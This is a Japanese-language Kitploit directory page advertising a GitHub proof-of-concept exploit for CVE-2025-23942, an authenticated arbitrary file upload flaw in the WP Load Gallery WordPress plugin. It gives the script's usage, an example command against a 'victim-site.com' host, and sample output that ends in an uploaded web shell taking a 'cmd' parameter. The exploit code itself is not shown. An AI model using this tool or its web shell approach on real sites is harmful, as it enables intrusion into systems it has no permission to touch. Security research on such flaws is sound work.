Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-23942-poc — WP Load Gallery <= 2.1.6 - 認証済み (Author+) 任意のファイルアップロード | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-23942-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2025-23942-poc

CVE-2025-23942-poc

WP Load Gallery <= 2.1.6 - 認証済み (Author+) 任意のファイルアップロード

リポジトリを見る
321年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

WP Load Gallery Exploit(CVE-2025-23942)

📌 説明

NgocCode WP Load Gallery における危険なタイプのファイルアップロード制限不備の脆弱性により、WebサーバーへのWeb Shellのアップロードが可能になります。この問題はWP Load Gallery:n/a から 2.1.6 までに影響します。

⚠️ 脆弱性詳細

  • CVE ID: CVE-2025-23942
  • 影響を受けるプラグイン: WP Load Gallery
  • 影響を受けるバージョン: 2.1.6 まで
  • 脆弱性タイプ: 無制限ファイルアップロード
  • 深刻度: 緊急(CVSS 9.1)
  • 攻撃ベクトル: 認証済み(Author+)リモートコード実行(RCE)
  • パッチの有無: ❌ (公式パッチ未提供)

🚀 エクスプロイトの機能

✅ 自動エクスプロイト – nonceを抽出し、ログイン後、シェルを自動的にアップロードします。
✅ バージョンチェック – エクスプロイト前にターゲットが脆弱かどうかを確認します。
✅ エラーハンドリング – 障害が発生してもスムーズに実行できるようにします。
✅ セッション管理 – 認証に持続的なセッション管理を使用します。
✅ リアルタイムフィードバック – 各ステップで出力を提供します。

🛠️ 必要条件

  • Python 3.x
  • requests モジュール(pip install requests)
  • ターゲットシステム上の有効な WordPress Author+ アカウント

🔥 使用方法

必要なパラメータを指定してスクリプトを実行します:

root@kitploit:~
usage: CVE-2025-23942.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit WP Load Gallery - Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress Username
  -p PASSWORD, --password PASSWORD
                        WordPress Password

例:

root@kitploit:~
python CVE-2025-23942.py -u http://victim-site.com -un author_user -p password123

📝 出力例

root@kitploit:~
   _______      ________    ___   ___ ___  _____     ___  ____   ___  _  _ ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|   |__ \|___ \ / _ \| || |__ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__   _/ / 
 | |____   \  /  | |____    / /_| |_| / /_ ___) |    / /_ ___) |  / /   | |/ /_ 
  \_____|   \/   |______|  |____|\___/____|____/    |____|____/  /_/    |_|____|

[+] Checking plugin version...
[+] Detected version: 2.1.6
[+] The target is vulnerable! Proceeding with exploitation...
[+] Logged in successfully.
[+] Extracting wplg_nonce...
[+] Extracted wplg_nonce: a1b2c3d4e5
[+] Uploading shell...
[+] File uploaded successfully!
[+] Shell is accessible at: http://victim-site.com/wp-content/uploads/2025/02/nxploit.php?cmd=id

📜 法的免責事項

このエクスプロイトは教育およびセキュリティ研究目的のみを対象としています。自分が所有していない、またはテストする明示的な許可を得ていないシステムで使用しないでください。作者はこのスクリプトの誤用について一切の責任を負いません。 ( Khaled_alenazi )

ツールをダウンロード